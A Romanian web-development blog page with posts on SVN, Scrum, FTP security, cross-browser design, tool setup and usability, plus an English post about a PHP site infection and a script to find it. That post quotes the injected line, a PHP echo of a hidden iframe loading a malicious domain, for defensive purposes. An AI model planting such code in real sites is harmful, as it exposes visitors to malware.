Category: development

Web development, Drupal, PHP, MySQL, HTML5, CSS3, jQuery

SVN 1.7 – Un update important

Zilele trecute s-a lansat versiunea 1.7 de la SVN. Un update important pentru SVN care se luptă să țină pasul cu Git. Dintre noutăți:

  • un singur folder .svn (nu mai avem câte unul în fiecare subfolder)
  • faster server operations
  • o nouă comandă svn patch (aplici patch-uri direct, fără să mai ai nevoie de alte softuri)

Restul le găsiți aici.

SCRUM

Wikipedia zice:

Scrum is an iterative, incremental methodology for project management often seen in agile software development, a type of software engineering.

Although Scrum was intended for management of software development projects, it can be used to run software maintenance teams, or as a general project/program management approach

Iar pentru cei interesaţi, am dat şi de un video explicativ pe DZone:

Securitate WEB: Cum să îţi protejezi conturile de FTP

Un lucru des neglijat de webmasteri este clientul de FTP folosit la transferul de fisiere. Un client de ftp bun te poate scuti de neplăcerile cauzate de anumiţi viruşi pe când un client prost te transformă în victimă sigură.

Recomandările mele în această privinţă ar fi:

  • încercaţi să folosiţi pe cât posibili protocolul sftp:// (informaţiile sunt criptate şi nimeni nu vă poate “spiona”)
  • schimbaţi-vă parola de la contul de ftp periodic
  • folosiţi un client ftp avansat (recomand cu încredere FileZilla Client)

Din fericire majoritatea nu au întâmpinat până acum probleme de securitate din cauza asta. Eu, şi alte cunoştinţe, am fost victima unui astfel de atac, care se manifesta prin modificare tutor fişierelor php de pe server care conţineau în nume main sau index şi adăugarea de cod aiurea (iframe-uri ascunse care încărcau site-uri virusate).

Lucrurile se petreceau în felul următor. Eu mă conectam la la ftp folosind Total Commander, cineva din reţea avea un virus care monitoriza traficul şi fura conturile de ftp. După ce fura datele de autentificare pe ftp, se conecta la server şi începea să caute fişierele php în care introducea codul maliţios.

De atunci eu nu mai folosesc Total Commander pentru ftp şi îmi schimb parola de ftp periodic.

Probabil vă întrebaţi de ce dau vina pe TotalCommander, ei bine, pentru că virusul de manifesta numai după ce mă conectam cu TotalCommander (da, am fost virusat de mai multe ori la rând până să îmi dau seama cum pot să ma protejez).

Dacă aţi fost cumva victima unui astfel de atac, am postat mai de mult un script care poate căuta fişierele infectate pe ftp.

Cum să faci un site compatibil cu toate browserele populare

Ştim cu toţi avantajele de a avea o pagină web compatibilă cu toate browserele. Cu toate acestea, puţin web-designeri reuşesc să facă site-uri compatibile cu majoritatea browserelor populare.

Cauzele pentru lipse de compatibilităţi sunt multe:

  1. browsere proaste (multă “sănătate” creatorilor Internet Explorer)
  2. webdesigneri lipsiţi de experienţă (se lucrează pe bani puţini de obicei, cei buni preferă să se reprofileze şi astfel munca ajunge să fie făcută de persoane lipsite de experienţă)
  3. ignorarea standardelor şi  abuzarea de dirty trick-uri în design

Daca punctul 1 nu ţine de programator, şi nu se poate face mare lucru, restul cauzelor pot fi uşor înlăturare. De aceea, am să descriu paşi pe care eu îi urmez pe parcusul creării unui design html compatibil cu toate browserele.

1. Standardele W3C

Toţi cei care lucrează ca designeri web au pretenţia ca browserele să le citească gândurile şi să afişeza paginile create aşa cum vor ei, toate aste fără ca ei să ţină cont de regulile limbajului. Atunci când tu nu îţi validezi pagina, de ce ai pretenţia ca browserul să se comporte exemplar?

Din punctul meu de vedere, nu poţi da vina pe browser cât timp pagina ta nu e validă. Chiar dacă erorile nu ţin neapărat de eroarile tale. E o chestie de bun simţ şi după ce o să începi să o aplici o să conştientizezi multe din greşelile pe care le faceai fără să-ţi dai seama. Un motiv în plus, e faptul că e foarte uşor să crezi o pagină cu cod valid dacă eşti foarte puţin atent pe parcusul dezvoltării.

Mulţi preferă să îţi valideze paginile după ce au terminat de creat. Lucru pe care nu-l recomand nimănui, mai ales celor care sunt la început cu studiul standardelor. E foarte greu să validezi un cod gata creat, modificările pe care trebuie să le faci s-ar putea să necesită multă muncă.  Aşa că cel mai simplu e să-ţi validezi codul pas cu pas pe parcusul scrieri codului. Lucru deloc complicat, dacă ai instalat Html Validator. O să ai în permanenţă o iconiţă în bara de status a browserului care te avertizează când scrii prostii. Plus că îţi oferă nişte features extra în fereastră de vizualizare a codului sursă (înclusiv lista cu erorile descoperite şi explicaţi / sfaturi cu privire la fiecare eroare). So… creare de cod valid e joacă de copil cu extensia asta instalată.

2. XHTML sau HTML

Dilema asta are legătură punctul anterior, dar o consider destul de importantă aşa că merită să fie evidenţiată.
Momentan, în webdesing există trendul XHTML. Toată lumea e super mega încântată de acest standard dar uită nişte detalii. Nu are rost să dezbat problema care a fost dezbătută acum mult timp de către alţii. Detalii găsiţi aici. Ideea de bază e că de multe ori XHTML vine la pachet cu câteva issues pe care mulţi nu le ştiu, şi în practică nu ai nevoie de XHTML, putând folosi la fel de bine limbajul HTML corect formatat.

Personal recomand folosirea standardului HTML 4.01 Transitional:

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>

Sintaxa este la fel ca cea de la XHTML, exceptând faptul că în secţiunea head nu se mai închi tag-urile gen link. Adică în loc de <link … /> o să folosiţi doar <link …>.

Regulile CSS sunt aplicate cu aceiaşi stricteţe ca şi la doctype-ul xhtml, asta ca să nu las loc de întrebare pentru cei care folosesc doctype-ul de xhtml din cauza asta.

3. CSS Reset

Toţi ştim că valorile default la atributele CSS diferă de la browser la browser. Aşa ca un CSS Reset te ajută să le aduci la un numitor comun. În plus de asta, te obligă uneori să defineşti unele atribute în mod express. De exemplu atributul margin la paragrafe este 0, şi dacă vrei ca textul tău să arate frumos, o să trebuiască să-l defineşti tu. În caz că nu foloseai CSS Reset, erai tentat să laşi valoare default, care diferă foarte mult de la browser la browser.

De asemenea te scuteşte de multe probleme de design apărute din cauza valorilor default a unor browsere. Exemplu: cine se gândea că tag-ul <form> are margin în IE? Adică un element invizibil care îţi strică designul şi pierzi o grămadă de timp să vezi care e buba.

Până acum am folosit numai CSS Reset-ul oferit aici. Se găsesc pe net mai multe variante, dar majoritatea au la bază acest css reset.

4. Probleme specifice Internet Explorer 6

Din toată familia de browsere Internet Explorer, cea mai veche versiune demnă de luat în calcul e Internet Explorer 6. Versiunile mai vechi chiar nu cred că mai sunt folosite, din moment ce Internet Explorer 6 vine gata instalat pe Windowx XP, deducem că ar trebui să ai Windows ’98 sau Millenium care vin cu versiuni mai vechi de Internet Explorer, ceea ce e foarte puţin probabil. Utilizatorii de Internet Explorer pe Mac nu cunosc, au deja Safari, nu văd de ce ar mai folosi Internet Explorer.

Dintre toate versiuniele 6, 7 şi 8, versiune 6 e cea mai problematică pentru designeri. Nu cunoaşte multe reguli de CSS, si cel mai grav nu afişează PNG-urile corect. Probleme însă sunt destul de vechi, şi între timp s-au descoperit rezolvări la majoritatea din ele, de exemplu:

  • PNG Fix: aici există mai multe soluţii, eu folosesc varianta asta. am observat că mai există şi alte metode, unele chiar puţin mai elegante aparent, dar nu am testat nimic altceva până acum, aşa că nu pot să recomand. Dacă ştiţi alternativă mai bună la asta, vă rog să-mi spuneţi.
  • min-height: printre tagurile nerecunoscute de IE 6 se numără şi acesta. Cea mai simplă şi elegantă soluţie pentru a rezolva lipsa acestui atribut e codul de mai jos, care se bazează pe faptul că IE6 nu ştie de !important şi că el redimensionează automat containerul chiar dacă are height-ul setat:
    • min-height: 100px;
    • height: auto !important;
    • height: 100px;

Dacă o să-mi mai amintesc, o să mai notez aici şi alte soluţii găsite pentru problemele Internet Explorer 6.

Şi ca să nu termin în ton pesimist acest capitol, menţionez că sunt mulţumit de felul cum Internet Explorerul se descurcă cu poziţionările absolute şi relative. Nu ştiu de ce, dar aveam o impresie foarte proastă despre el la capitolul ăsta. Se pare că nu e chiar aşa.

5. Testarea

Un lucru foarte important şi des neglijat sau făcut în grabă este testarea. Este foarte important să verifici designul în toate browserele cât mai des. După fiecare bucată de cod scrisă trebuie să testezi. Ştiu că pare un proces mâncător de timp, dar te scuteşte de timp pierdut cu debugging-ul atunci când apar probleme. De ce zic asta? Pentru că atunci când apare o eroare, eşti sigur că este în bucata de cod scrisă de la ultima testare. Cu cât testezi mai des cu atât bucata aia de cod va fi mai mică, deci econimiseşti timp cu căutatul erorii.

Ordine de testare, adoptată de mine este următoarea:

  1. Firefox: browserul de bază, aici testez prima dată codul scris. Nu încep testele în alte browsere înainte să meargă bine. De asemenea tot aici trebuie testată şi validitatea codului înainte de a merge mai departe cu testele.
  2. Internet Explorer, cele 3 versiuni importante: 6,7 şi 8
  3. Chrome – până acum nu am avut deloc probleme cu aici.
  4. Opera
  5. Safari, deşi nu mai este neapărat nevoie, din moment ce împarte acelaşi engine ca şi Chrome.

6. Don’t

Lucruri pe care nu ar trebui să le faci, atunci când dezvolţi o pagină compatibilă cu toate browserele este să scrii cod separat pentru fiecare browser în parte. Cei care fac acest lucru abuzează de conditional comments recunoscute de Internet Explorer pentru a rescrie aproape tot CSS-ul. Cea mai urâtă versiune de don’t design întâlnită folosea php ca să genereze cod html diferit pentru browserele cu probleme.

De asemenea, trebuie evitate dirty trick-urile. Încercaţi să scrieţi numai cod valid. Evitaţi probleme folosind tehnici elegante, cum este cea prezentată mai sus cu min-height. Nu folosiţi w_idth ştiind ca IE îl recunoaşte pentru a da dimensiuni diferite pentru IE.

De când am început să folosesc CSS Reset nu am mai folosit conditional elements şi nici un alt trick pentru a trata diferit browserele. Singura utilitate a conditional comments e folosirea PNG FIX-ului în Internet Explorer 6.

Cum să-ţi pregăteşti PC-ul pentru webdesign

Pentru toţi cei care vor să se apuce serios de webdesign sau pentru cei care au început deja şi au nevoie de ajutor, am pregătit un mic ghid pentru configurarea calculatorului pentru webdesign.

Înainte de toate se presupune că sistemul de operare e deja instalat, şi că face parte din familia Micro$oft. Pentru Linux o să scriu pe viitor.

Acum, să începem lista cu programe necesare:

1. Browsere

Sunt de nelipsit din viaţa unui webdesigner. Îţi trebuie instalate toate, chiar dacă tu foloseşti mai mult Firefox-ul. Şi pe lângă asta, o să mai ai nevoie şi de multe plugin-uri care o să-ţi facă viaţa mai uşoară în lupta cu bug-urile.

Lista de browsere trebuie să conţină neapărat:

  • Firefox, aka “The God Father of browsers”, cu  următoarele extensii:
    • Firebug – o mulţime de tool-uri foarte utile (debug css,html / dom inspector, javascript, http request headers, etc)
    • Html Validator – validează codul html (mai multe alte opţiuni disponibile)
    • Colorzilla – pentru că, din când în când mai ai nevoie să copiezi coduri de culoare hexa (color picker)
    • MeasureIt – folositor atunci cand îţi baţi capul cu dimensiuni
    • Web Developer – o mulţime de butoane folositoare (re-dimensionare fereastră pentru diferite rezoluţii, disable js, etc)
  • IE Tester, pentru că trebuie şi pentru că merită. O singură fereastră şi testezi pagina in Internet Explorer 5.5, 6, 7 şi 8 fără bătai de cap. Câte un tab pentru fiecare motor de randare.
    • DebugBar – este un tool compatibil cu IE Tester, este asemănător cu Firebug-ul din Firefox
  • Chrome, pentru că e un browser care promite multe pe viitor, şi care e destul de popular
  • Safari, deşi rulează ca şi Chrome-ul, folosind WebKit, nu e rău să-l ai instalat. Teoretic, o pagină care merge bine în Chrome merge bine şi în Safari în 99.9% din cazuri.
  • Opera, pentru că e unul dintre cele mai vechi browsere şi pentru că nu ridică probleme prea mari de obicei. Are bug-uri specifice la anumite interpretări de CSS, dar sunt rare şi se rezolvă rapid.

Nu am menţionat pe listă Multiple IE, care face acelaşi lucru pe care îl face şi IETester, pentru că e mai greu de folosit (fiecare browser are fereastra proprie şi se încarcă destul de greu), nu poţi avea IE7 si IE8 simultan decât dacă te complici, etc.

2. Editoare pentru cod

Aici lucrurile sunt discutabile. Fiecare are un editor preferat. Eu personal folosesc Programmers Notepad 2. E simplu şi ştie cam tot ce am eu nevoie. Recomand de asemenea Komodo Edit, care e ceva mai avansat decat Programmers Notepad, dar care porneşte ceva mai greu (doar e bazat pe core-ul de la Firefox).

Mai puteţi încerca Notepad++, Dreamweaver, PSPad şi multe altele. Cu excepţia Dreamweaverului toate editoarele menţionate sunt free.

3. Editare imagini

De bază la acest capitol ar fi Photoshop-ul, însă având în vedere că nu e free, ne orientăm atenţia către alternative free:

  • Paint.NET – un mini Photoshop gratuit. Are cam toate toolurile şi efectele de bază din Photoshop, ştie layere şi dacă te obişnuieşti cu el, nu o să mai simţi lipsa Photoshopului.
  • Irfan Viewer – exact cum spune şi numele e photo viewer la bază, dar mai ştie de asemenea şi convertiri între mai toate formatele de imagine, batch convert tool foarte util.
  • GIMP – rivalul Photoshop din tabăra Linux / OpenSource. Din păcate lupta de orgolii a făcut ca acesta să fie structurat foarte diferit faţă de Photoshop. Oferă aproape tot ce oferă şi Photoshopul, numai să şti să-l foloseşti.

4. FTP Clients

Programe indispensabile atunci când vrei să uploadezi site-ul pe server. Aici alegerea e mai simplă. Avem Filezilla Client care este cel mai popular, şi cred că cel mai bun client ftp free (concurează cu cele mai bune aplicaţii plătite din punctul meu de vedere).  Apoi, pentru cei mai puţin pretenţioşi, Total Commanderul are un client ftp integrat.

5. Server local pentru dezvoltare şi testare

Necesar doar în cazul în care aveţi de gând să lucraţi cu limbaje de programare gen PHP, PERL, etc. Pentru a creea pagini simple HTML nu aveţi nevoie de aşa ceva.

Variante disponibile:

  • WAMP – recomandare personală datorită utilitarelor cu care vine. Setările de bază se fac cu un singur click, şi la fel de uşor poţi schimba diferite variante de PHP, Apache şi MySQL.
  • XAMPP – la fel de uşor de instalat şi de folosit. Vine cu modul https instalat default (spre deosebire de WAMP), dar pentru a modifica configurările  trebuie să editaţi manual fişierele config.
  • Instalare separată Apache,PHP, MySQL. Nu recomand nimănui pentru că se pierde o grămadă de timp cu configurarea fiecărei componente în parte, şi dacă ceva nu merge s-ar putea să pierzi ore făcând debugging.

6. SVN Clients

Dacă lucrezi în echipă folosirea SVN-ului sau a orcărui revision control system e obligatorie. Eu folosesc şi la proiectele personale din mai multe motive:

  • poţi urmări uşor toate modificările asupra unui fişier
  • poţi lucra de pe mai multe calculatoare fără să îţi baţi capul cu sincronizarea fişierelor
  • e integrat în issue tracking systems cum ar fi Trac, Redmine şi chiar în The Bug Genie.

Pentru platforma Windows nu cred că există alternativă mai bună la Tortoise SVN, de aceea e singurul care îl recomand. Dacă aveţi nevoie de apelarea svn din linie de comandă puteţi folosi SlikSVN (eu îl folosesc pentru a face update-uri automate din linia de comandă folosind scripturi PHP).

Pentru hosting gratuit de SVN puteţi încerca Assembla.  Este gratuit, cu ceva limitări care nu deranjează. Oferă pe lângă SVN şi Trac hosting gratuit. Testat personal şi recomand cu încredere.

Pentru sugestii / completări / întrebări puteţi lăsa un comentariu.

Web – usability

Post scris pentru concursul organizat de www.cipy.ro.

La începuturile “carieri” mele ca webdeveloper îmi făceam veacul pe phorum.ro. Acolo am auzit prima oara de usability şi de seo. Între timp m-am documentat mai intens cu tot felul de articole ce veneau ca recomandări din partea Google-ului când îl întrebam despre aşa ceva.

Ce am înţeles eu în legătură cu usability în anii care au trecut de atunci, şi în care am lucrat ca webdesigner:

  1. Încearcă să faci site-urile cât mai simple. Nu încărca site-ul cu lucruri inutile pentru vizitator. Mulţi au tendinţa de a pune tot felul de countere si alte lucruri inutile pe site. Timpul de încărcare a paginii creşte, la fel şi timpul de randare a browserului, imi faci trafic degeaba dacă intru de pe mobil (şi plătesc la kb tranferaţi), plus că imi poţi bloca compul cu banere flash. Timpul pe care e dispus să-l aştepte un internaut să se încarce un site e undeva în jurul a 7-8 secunde, dacă site-ul tău depăşeşte acest timp, utilizatorul îi va acorda din start o bilă neagră înainte să mai vadă conţinutul.
  2. Testează-ţi site-ul în toate browserele. Ţine mai mult de accesibilitate, dar dacă browserul meu nu afişează cum trebuie pagina, cred că se alege praful şi de usability. Ştiu că a face un site compatibil cu majoritatea browserelor e dificil la început, dar când ai ceva experienţă nu o să ţi se pară un impediment. Pentru a face un site compatibil cu toate browserele trebuie doar să testezi site-ul pas cu pas în timpul creaţiei lui (în caz că îl faci de la zero). Eu personal lucrez în Firefox, şi dupa fiecare bucată de cod scris verific şi în celelate browsere: IE7 şi IE6. Chrome, Opera, Safari de obicei nu au probleme de randare, şi, dacă îţi merge în Firefox şi Internet Explorer sunt 99% şanse să nu ai probleme cu restul browserelor. Sfaturi găseşti aici.
  3. Oferă alternative de navigaţie. Asta se aplica în cazul meniurilor flash sau javascript. Deşi e puţin probabil ca cineva să nu aibă javascriptul activat, e bine să fi pregătit. La meniurile în flash probabilitatea ca cineva să nu aibă flash sau să aibă flash-ul dezactivat e mare (chiar eu foloseam în trecut FlashBlock – extensie de Firefox). De asemenea linkurile din footer-ul paginii pot fi foarte folositoare atunci când ai mult conţinut şi accesând linkurile din footer poţi scăpa de plăcerea de a da scroll la toata pagina.
  4. Structurează-ţi bine informaţia. Nu deruta utilizatorul cu titluri care nu au legătură cu conţinutul. Situaţii în care mai multe pagini au titluri asemănătoare trebuie de asemnea evitate. Utilizatorul va fi derutat şi nu va ştii ce să aleagă, mai bine ai grupa toate informaţiile pe o singură pagină. Informaţia ar trebui să fie concisă, evită pe cat posibil clişeele lungi şi plictisitoare.
  5. Ţine cont de regula literei F. După studii de usability, s-a ajuns la concluzia ca utilizatorul scanează pagina ca şi cum ar desena litera F: se uita la partea de sus (header), apoi în stânga (unde de obicei e meniul), scanează apoi conţinutul de la mijlocul paginii, iar la final îşi aruncă ochii în partea de sub meniu. Studiu ăsta a fost facut prin 2000 – 2003, în prezent nu cred că mai este foarte relevant în forma originală. Blogurile,de exemplu, au meniul pe partea dreaptă de obicei, eu prefer să cred ca această regulă se aplică acum şi pentru litera F în oglindă.
  6. Acces rapid la informaţii. Toate informaţiile importante de pe site-ul tău trebuie să fie tot timpul la un click distanţă, oriunde ai fi în site.
  7. Sitemap. Dacă structura site-ul este foarte complexă (site-ul conţine multă informaţie) şi punctul 4 nu e respectat, atunci o să scuteşti ceva timp vizitatorilor care pierd timp navigând printre secţiunile site-ului în speranţa că vor găsii ce vor.
  8. Search. Nu concep să existe site fără aşa ceva (exceptând site-urile cu 2-3 pagini). Google oferă aşa ceva gratuit, scuza cu “nu ştiu / nu am timp să implementez” nu mai ţine.
  9. Testează-ţi site-ul cu un prieten. Cea mai simplă metodă de vedea cum stai la capitolul usability, este să rogi pe cineva să navigheze pe site, sau să folosească aplicaţia web pe care ai facut-o. Ai fi suprins să vezi cum oamenii care văd site-ul / aplicaţia pentru prima oară să nu înţeleagă mare lucru din ea. Un astfel de test te ajută să îţi restructurezi meniurile şi linkurile mult mai intuitiv, şi chiar să redenumeşti anumite secţiuni al căror nume nu e foarte sugestiv.
  10. Foloseşte intens site-ul / aplicaţia creată. Pe lângă testul explicat la punctul 9, aceasta este iar o metodă bună de a face o aplicaţie sau un site mai uşor de folosit. Plecând de la Amdahl’s Law (trăiască dl. Vlăduţiu), în felul ăsta vei găsii lucrurile care lipsesc pentru a face utilizarea cât mai uşoară. De exemplu o să constaţi ca după fiecare pagină ai vrea să mergi înapoi, şi butonul de back e tocmai sus în meniu, lucru care nu ridică semne de întrebare la început, dar după ce ai lucrat cu site-ul/aplicaţia o să îi simţi lipsa şi o să-l adaugi şi în partea de jos.

Şi cred că să ma opresc din plictisit lumea aici. Aş mai putea găsi încă pe atâtea lucruri de care m-am lovit lucrând ca webdesigner, dar o să continui cu altă ocazie.

How to search in files on ftp (remove php infections)

The infection

Recently, my site was infected with some kind of a php virus. My ftp account was broken (brute-force I suppose) so every php file that contains “index” and “main” in filename was modified, and the following line of code was added:

echo “<iframe src=\”http://some-stupid-domain.com/?some-parameter=xx1B10xx\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

So, the effects of this are:

  • some scripts refuse to work (phpmyadmin, phpbb forum login, etc), mostly every script that uses header() function from php
  • I was temporary blacklisted in Google
  • my users were expose to the risk of being infected with malware
  • I got nervous (and I’m usually very calm)
  • I discovered that my hosting company sucks (I cannot upload files with multiple connections because I get block listed by their firewall, but my password can be stolen using brute-force attack, and when this happens is supposed to be only my problem)

The solution

I needed a script to find what file contains malicious code, so I made a php script, that connect through ftp, search and every file and every directory for php files (I’ve tried to find a software for this, but with no results). When a php file is found on ftp, it downloads it, and search if malicious code is found.

Also, when a file is detected as “infected”, the script makes a copy of that file in backup folder, so webmaster can manually check and delete unwanted code. I prefer manually disinfection, because various versions of code was found (a was having links to different domains).

Features:

I know that ftp connection is not something that you can rely on, and the connection will broke after some time. So, the scripts should make some loops to retry every failed command few times before exits. This solution requires more lines of code and the complexity of the algorithm will increase.

To fix this issue, I added a list with already parse files and directories (parsed.txt). When the script find a directory or a file that’s on that list, it ignores it (since is already parsed). This way, you can forcelly stop the script whenever you want and resume it anytime.

Also, a list with infected files will be created (if any infected file is found).

Configuration

Before you can run the script you need to be sure that you modify the ftp server info (server adress, login username and password).

To do this, you need to open find_in_files_on_ftp.php with your favorite code editor (avoid Notepad, please). The lines you need to edit are shown below:

// Configuration
$ftp_server = ‘your_ftp_server’;
$ftp_user = ‘your_ftp_username’;
$ftp_pass = base64_decode(‘password encoded as base64’);
$virus_string = ‘echo “<iframe’; // string to found

I hope that is very clear what every variable means, so I will not discus about them excepting the password. I chose base64 encode for my password, so if someone see it, he can’t remeber it even if it’s common word.

Also, if you want to change the connecting port (default it’s 21), you can manually edit line 19, and replace 21 with you desired port.

Running the script

The script was made and tested on Windows XP, but it should work on every OS that supports PHP. I will test it on linux when I will have some free time.

To run the script on windows you should have php instaled and follow one of the following procedures:

  • Add php/bin folder to PATH variable enviroment, so you can easly run php with “php” command and run find_in_files_on_ftp.bat
  • Right click on find_in_files_on_ftp.php file, and chose Open with and Browse to php.exe

Download

Click on the link bellow to download ( ~2.47kbytes):

find_in_files_on_ftp.zip

Add subdomains to WAMP

Situation:

WAMP installation on Windows XP SP 3 on C:\wamp\
Dynamic DNS account at www.dyndns.com ( I will use domain.dyndns.org ).

Solution:

1. Open c:\wamp\bin\apache\apache2.2.8\conf\httpd.conf

2. Find line: ServerName localhost

3. Replace with line: ServerName domain.dyndns.org (Or you can comment it, it will work, but you will get a warning in apache log)

3. Scroll down to the end of the file and add:

NameVirtualHost *:80

#default root

<VirtualHost *:80>
DocumentRoot “C:/wamp/www”
ServerName *.domain.dyndns.org
ServerAlias localhost
</VirtualHost>

#subdomain

<VirtualHost *:80>
DocumentRoot “C:/wamp/www/subdomain”
ServerName todo.domain.dyndns.org
ServerName todo.myweb
</VirtualHost>